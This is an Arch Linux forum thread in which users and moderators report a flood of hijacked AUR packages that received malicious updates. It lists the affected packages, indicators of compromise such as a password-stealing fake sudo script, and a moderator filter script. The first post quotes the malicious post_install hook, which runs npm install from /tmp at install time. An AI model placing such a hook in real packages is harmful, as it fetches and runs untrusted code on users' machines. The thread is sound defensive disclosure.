multiple malicious AUR updates

darthvader · Today 15:32:48

i just received multiple emails regarding packages i used to contribute to, with malicous updates, they all have this new .install file(or similar):

+post_install() {{
+  cd /tmp
+  npm install atomic-lockfile axios cosmiconfig uuid
+}}

packages: perl-alien-wxwidgets, premake-git, smenu, git-annex-standalone, panwriter, smenu, fatx, vbam-git, ipfs-desktop-bin

this is active and ongoing, they've been taken over by new accounts with random names and random emails.

Last edited by darthvader (Today 16:10:00)

yochananmarqos · Today 15:35:16

Yes, there has been quite a flood in the last hour or so. See the recent aur-general posts.

gromit · Today 15:38:17

The Moderation team is aware and a few of the moderators are already cleaning things up!

xsmile · Today 16:08:57

Noticed it as well. Indicators of compromise can be:
- a new systemd user service with a random name pointing to the hidden malicious binary
- a shell script at ~/.local/bin/sudo for stealing passwords
- tor network traffic

deadYokai · Today 16:16:43

i have same with python-openai-harmony package

Mylloon · Today 17:16:57

Got those too:

- https://aur.archlinux.org/packages/monochrome-git
- https://aur.archlinux.org/packages/monochrome
- https://aur.archlinux.org/packages/hear … ux-gui-bin
- https://aur.archlinux.org/packages/hear … i-appimage

gromit · Today 17:24:24

We have a filter script to find those, see the example here: https://github.com/archlinux/contrib/pull/108

Arch Linux

#1 Today 15:32:48

multiple malicious AUR updates

#2 Today 15:35:16

Re: multiple malicious AUR updates

#3 Today 15:38:17

Re: multiple malicious AUR updates

#4 Today 16:08:57

Re: multiple malicious AUR updates

#5 Today 16:16:43

Re: multiple malicious AUR updates

#6 Today 17:16:57

Re: multiple malicious AUR updates

#7 Today 17:24:24

Re: multiple malicious AUR updates

Board footer